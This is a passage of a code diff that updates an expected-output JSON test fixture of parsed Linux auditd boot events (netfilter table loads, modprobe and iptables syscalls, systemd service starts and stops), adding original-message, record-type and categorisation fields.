"@timestamp": "2016-12-07T02:16:24.858Z", "auditd.log.entries": 0, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 18, "auditd.log.table": "raw", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076984.858:18): table=raw family=2 entries=0", "event.type": [ "change" ], @@ -343,9 +472,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076984.858:18): arch=c000003e syscall=313 success=yes exit=0 a0=0 a1=41a15c a2=0 a3=0 items=0 ppid=395 pid=396 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -370,15 +506,19 @@ "@timestamp": "2016-12-07T02:16:24.870Z", "auditd.log.entries": 0, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 19, "auditd.log.table": "security", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076984.870:19): table=security family=2 entries=0", "event.type": [ "change" ], @@ -401,9 +541,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076984.870:19): arch=c000003e syscall=313 success=yes exit=0 a0=0 a1=41a15c a2=0 a3=0 items=0 ppid=398 pid=399 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -428,15 +575,19 @@ "@timestamp": "2016-12-07T02:16:24.877Z", "auditd.log.entries": 0, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 20, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076984.877:20): table=mangle family=2 entries=0", "event.type": [ "change" ], @@ -459,9 +610,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076984.877:20): arch=c000003e syscall=313 success=yes exit=0 a0=0 a1=41a15c a2=0 a3=0 items=0 ppid=401 pid=402 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -486,15 +644,19 @@ "@timestamp": "2016-12-07T02:16:24.931Z", "auditd.log.entries": 0, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 21, "auditd.log.table": "nat", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076984.931:21): table=nat family=2 entries=0", "event.type": [ "change" ], @@ -517,9 +679,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076984.931:21): arch=c000003e syscall=313 success=yes exit=0 a0=3 a1=41a15c a2=0 a3=3 items=0 ppid=406 pid=407 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -542,15 +711,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.939Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 22, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "yum-cron", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.939:22): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=yum-cron comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 4785, @@ -563,15 +742,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.945Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 23, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "rhel-dmesg", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.945:23): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=rhel-dmesg comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 5017, @@ -584,15 +773,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.953Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 24, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "acpid", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.953:24): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=acpid comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 5251, @@ -605,15 +804,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.954Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 25, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "systemd-user-sessions", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.954:25): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=systemd-user-sessions comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 5480, @@ -626,15 +835,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.960Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 26, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "ntpd", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.960:26): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=ntpd comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 5725, @@ -649,15 +868,19 @@ "@timestamp": "2016-12-07T02:16:24.982Z", "auditd.log.entries": 0, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 27, "auditd.log.table": "filter", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076984.982:27): table=filter family=10 entries=0", "event.type": [ "change" ], @@ -680,9 +903,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076984.982:27): arch=c000003e syscall=313 success=yes exit=0 a0=0 a1=41a15c a2=0 a3=0 items=0 ppid=422 pid=423 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -705,15 +935,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.012Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 28, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "systemd-logind", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.012:28): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=systemd-logind comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 6353, @@ -726,15 +966,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.031Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 29, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "crond", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.031:29): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=crond comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 6591, @@ -747,15 +997,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.043Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 30, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "expand-root", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.043:30): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=expand-root comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 6820, @@ -768,15 +1028,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.044Z", + "auditd.log.record_type": "SERVICE_STOP", "auditd.log.sequence": 31, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "expand-root", - "event.action": "service_stop", + "event.action": [ + "stopped-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_STOP msg=audit(1481076985.044:31): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=expand-root comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "stop" + ], "fileset.name": "log", "input.type": "log", "log.offset": 7055, @@ -791,15 +1061,19 @@ "@timestamp": "2016-12-07T02:16:25.069Z", "auditd.log.entries": 0, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 32, "auditd.log.table": "raw", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.069:32): table=raw family=10 entries=0", "event.type": [ "change" ], @@ -822,9 +1096,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.069:32): arch=c000003e syscall=313 success=yes exit=0 a0=0 a1=41a15c a2=0 a3=0 items=0 ppid=439 pid=440 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -847,15 +1128,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.104Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 33, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "sshd-keygen", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.104:33): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=sshd-keygen comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 7686, @@ -870,15 +1161,19 @@ "@timestamp": "2016-12-07T02:16:25.099Z", "auditd.log.entries": 0, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 34, "auditd.log.table": "security", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.099:34): table=security family=10 entries=0", "event.type": [ "change" ], @@ -901,9 +1196,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.099:34): arch=c000003e syscall=313 success=yes exit=0 a0=0 a1=41a15c a2=0 a3=0 items=0 ppid=445 pid=446 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -928,15 +1230,19 @@ "@timestamp": "2016-12-07T02:16:25.128Z", "auditd.log.entries": 0, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 35, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.128:35): table=mangle family=10 entries=0", "event.type": [ "change" ], @@ -959,9 +1265,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.128:35): arch=c000003e syscall=313 success=yes exit=0 a0=0 a1=41a15c a2=0 a3=0 items=0 ppid=449 pid=450 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -984,15 +1297,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.164Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 36, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "plymouth-quit", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.164:36): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=plymouth-quit comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 8723, @@ -1005,15 +1328,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.166Z", + "auditd.log.record_type": "SERVICE_STOP", "auditd.log.sequence": 37, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "plymouth-quit", - "event.action": "service_stop", + "event.action": [ + "stopped-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_STOP msg=audit(1481076985.166:37): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=plymouth-quit comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "stop" + ], "fileset.name": "log", "input.type": "log", "log.offset": 8960, @@ -1026,15 +1359,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.167Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 38, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "plymouth-start", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.167:38): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=plymouth-start comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 9196, @@ -1047,15 +1390,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.168Z", + "auditd.log.record_type": "SERVICE_STOP", "auditd.log.sequence": 39, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "plymouth-start", - "event.action": "service_stop", + "event.action": [ + "stopped-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_STOP msg=audit(1481076985.168:39): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=plymouth-start comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "stop" + ], "fileset.name": "log", "input.type": "log", "log.offset": 9434, @@ -1068,15 +1421,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.170Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 40, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "plymouth-quit-wait", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.170:40): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=plymouth-quit-wait comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 9671, @@ -1089,15 +1452,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.170Z", + "auditd.log.record_type": "SERVICE_STOP", "auditd.log.sequence": 41, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "plymouth-quit-wait", - "event.action": "service_stop", + "event.action": [ + "stopped-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_STOP msg=audit(1481076985.170:41): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=plymouth-quit-wait comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "stop" + ], "fileset.name": "log", "input.type": "log", "log.offset": 9913, @@ -1110,15 +1483,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.180Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 42, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "serial-getty@ttyS0", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.180:42): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=serial-getty@ttyS0 comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 10154, @@ -1131,15 +1514,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.187Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 43, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "getty@tty1", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.187:43): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=getty@tty1 comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 10396, @@ -1154,15 +1547,19 @@ "@timestamp": "2016-12-07T02:16:25.191Z", "auditd.log.entries": 0, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 44, "auditd.log.table": "nat", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.191:44): table=nat family=10 entries=0", "event.type": [ "change" ], @@ -1185,9 +1582,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.191:44): arch=c000003e syscall=313 success=yes exit=0 a0=1 a1=41a15c a2=0 a3=1 items=0 ppid=452 pid=453 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1210,15 +1614,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.511Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 45, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "firewalld", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.511:45): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=firewalld comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 11027, @@ -1233,15 +1647,19 @@ "@timestamp": "2016-12-07T02:16:25.528Z", "auditd.log.entries": 5, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 46, "auditd.log.table": "nat", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.528:46): table=nat family=2 entries=5", "event.type": [ "change" ], @@ -1264,9 +1682,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.528:46): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=25be720 items=0 ppid=296 pid=476 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1291,15 +1716,19 @@ "@timestamp": "2016-12-07T02:16:25.532Z", "auditd.log.entries": 5, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 47, "auditd.log.table": "nat", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.532:47): table=nat family=2 entries=5", "event.type": [ "change" ], @@ -1322,9 +1751,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.532:47): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=1819720 items=0 ppid=296 pid=478 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1349,15 +1785,19 @@ "@timestamp": "2016-12-07T02:16:25.534Z", "auditd.log.entries": 6, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 48, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.534:48): table=mangle family=2 entries=6", "event.type": [ "change" ], @@ -1380,9 +1820,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": 